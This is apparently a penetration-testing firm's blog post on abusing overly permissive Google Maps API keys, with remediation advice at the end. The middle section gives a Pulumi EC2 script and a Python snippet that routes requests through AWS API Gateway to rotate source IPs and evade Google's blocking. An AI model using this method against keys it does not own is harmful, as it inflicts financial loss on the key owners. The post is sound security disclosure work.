A Pentester Story - How to Increase the Impact of a Underrated Issue

Too many organizations are risking their financial stability by not implementing proper security boundaries when using the Google Maps API Key. If you're in charge of an application that needs access to this service, be sure you have configured properly and placed appropiate security controls to prevent external abuse.

Security Hubs Team - March 24, 2022
  • API / Misconfiguration
  • Google Maps
A Pentester Story - How to Increase the Impact of a Underrated Issue
NARRATIVE

Google Maps API Key is a paid service that allows applications to embed & search from the Google Maps Database and use it on their applications. To consume those Google services, the organizations need to use an API key.

For example, the standard price of using Google API Key for Staticmap services is $2 per 1000 requests. Other services have a higher price per following visual example taken from the Google official website.

Google Maps API Key usage pricing

This API key is public and easily discoverable by any Internet user. Also, it can carry out several security configurations as over permissive usage rights. As with the other services consumed in the Cloud, it stays with the organization's technical team to be aware of its defaults and tweak them based on the current organization's needs.

Unfortunately, that is not the case in most situations. Although this issue does not impact customer data, confidentiality, or integrity-wise, Google Maps API keys are found overly permissive, lacking proper security boundaries that could lead to financial damage.

THE VULNERABILITY

The initial vulnerability research is straightforward and belongs to Ozgur Alp, a Turkish security researcher who first published it along with an open-source scanner. However, after almost two years since its details were initially released, we consider this finding reasonably underrated.

ADDED VALUE

To add more value to the final pentest results, we developed an addon concept that can be bootstrapped into the detection and attack flow. Overall we have tried to go a mile further than a simple confirmation of the key is "Vulnerable" or not and provide a PoC to the client that he can deploy and use to understand this issue impact based on his business model.

ATTACK SCENARIO

The overall economics of this attack consists of the ability of someone to abuse the API key and send millions of requests without getting blocked by the Google API Service.

Our original thinking was to brainstorm and detail a reusable PoC scenario that every client found affected by this issue could use and understand the attack vector dynamic. Because of the financial nature of this issue, we considered that the PoC should be tested by the organization team(s) itself.

It is worth to be mentioned that the Google API Service backend detects and blocks any short API key abuse firsthand, the whole defense is working based on the source IP address, meaning that using a large source IP addresses pool will bypass this primary line of defense.

And here is where the AWS is getting handy, because the API Gateway will automatically rotate the source IP address for us, and every request will have a different source IP address.

So, we decided to use two basic features that AWS has, an EC2 instance behind an AWS API Gateway. The concept of using AWS API Gateway to avoid IP restrictions is not new, and it was is well documented by a few others (check the References section).

And last but not least before jumping into the technical side of things, here’s the “complex” high-level design architecture of this idea.

Attack concept high-level design

BUILDING UP THE CONCEPT

Nowadays, any big three cloud providers allow you to use Infrastructure-as-a-Code to deploy and reuse custom architecture. Although many might say “Terraform”, we decided to take a slightly more exotic path and use the Pulumi IaC alternative. Some people do not like the Hashicorp scripting approach, but they are happy with the Python way, so here is where this option is getting handy.

Prerequisites

1. Install Pulumi: https://www.pulumi.com/docs/get-started/install/

2. Configure AWS credentials: https://www.pulumi.com/docs/intro/cloud-providers/aws/setup/

3. Create a project with

---------------------------------------------------------------------------
pulumi new aws-python --name(You actually may have to login into Pulumi)
---------------------------------------------------------------------------


4. Open __main__.py and replace the contents with the ones in this __main__.py

The (Pulumi) Script

---------------------------------------------------------------------------
import pulumi
import pulumi_aws as aws
size = 't2.micro'
ami = aws.get_ami(most_recent="true",
    owners=["your_aws_account_12_digits_number"],
    filters=[{"name":"name","values":["gmaps-api-demo"]}])
group = aws.ec2.SecurityGroup('maps-secgrp', description='Enable SSH access',
ingress=[
 { 'protocol': 'tcp', 'from_port': 22, 'to_port': 22, 'cidr_blocks': ['your_external_ip/32'] }
])
server = aws.ec2.Instance('Google-API-Cannon', instance_type=size,
vpc_security_group_ids=[group.id], # reference security group from above ami=ami.id)
pulumi.export('publicIp', server.public_ip)
pulumi.export('publicHostName', server.public_dns)
---------------------------------------------------------------------------


5. Run Pulumi up to preview and update your infrastructure - check the AWS account to see the instance

5.1. Run Pulumi destroy to clean up your resources.

5.2. Run Pulumi stack rm to delete your stack.

6. SSH into the fresh new EC2 instance and run the following commands:

6.1. - git clone the Google Maps API Scanner (Link is within the References section)

6.2. - python3 -m pip install requests

6.3. - python3 -m pip install requests-ip-rotator

6.4. - aws configure to use the AWS API Gateway

6.5. - check if the GMAPS API KEY is vulnerable or not

---------------------------------------------------------------------------
python3 maps_api_scanner_python3.py
---------------------------------------------------------------------------


6.5.1. If the API Key is reported vulnerable, then copy the attack vector direct link details. Under this circumstance, it is a simple GET request towards Google Gmaps backend.

6.5.2 For a straightforward PoC use the official example script provided by the request-ip-rotator Python library developer.

This is an example of Python script that uses AWS API Gateway and sends GET requests to a website.

---------------------------------------------------------------------------
import requests
from requests_ip_rotator import ApiGateway

with ApiGateway("target_affected_service_url") as g:
 session = requests.Session()
 session.mount("target_affected_service_url", g)

 # consider this only if you are interested in potentially log stuff or for debugging purposes

 response = session.get("target_affected_service_url")
 print(response.status_code)
---------------------------------------------------------------------------


Note: We will not share our full automated setup from obvious reasons. For a full weaponized automated PoC, you have to invest some time & effort, unite some dots and build up a setup that will scale your needs.

IMPACT

An organization's Google Maps API Key can be hijacked and used by someone else or abused for a (limited) financial loss damage.

Asking here and there, from what we know, Google's current billing behavior is to send invoices that sum up a total fee including all other services like Google Enterprise CAPTCHA API Key consumption, without providing a break-up cost on each of those. And this could mean anomalies can not be easily spotted by the procurement department.

RECOMMANDATION

- Restrict the API key features access down to the only ones agreed with the business side.

- Consider contacting Google Support, who, although acknowledged the issue, has yet to provide clear guidance about how to protect you against potential API key abuse scenarios.

- Record this issue within the organization's Internal Risk Assessment registry.

ACKNOWLEDGEMENTS | REFERENCES | RESOURCES


- https://cloud.google.com/maps-platform/pricing
- https://developers.google.com/maps/billing/gmp-billing
- https://phoenixnap.com/blog/what-is-pulumi
- https://ozguralp.medium.com/unauthorized-google-maps-api-key-usage-cases-and-why-you-need-to-care-1ccb28bf21e
- https://github.com/ozguralp/gmapsapiscanner/
- https://aws.amazon.com/api-gateway/faqs/
- https://docs.aws.amazon.com/lambda/latest/dg/services-apigateway.html
- https://bigb0ss.medium.com/rotating-source-ips-part-1-aws-api-gateway-fe29d2c5e008
- https://bigb0sss.github.io/posts/redteam-rotate-ip-aws-gateway/
- https://github.com/Ge0rg3/requests-ip-rotator


LEGAL STATEMENT

The information in this blog post is provided for research and educational purposes only. Whilst every effort has been made to ensure that the information contained in this document is true and correct at the time of publication, Security Hubs, Inc. accepts no liability in any form whatsoever for any direct or indirect damages arising or resulting from the use of or reliance on the information contained herein.

Ready or just curious?

Drop us a line and we will get back to you shortly.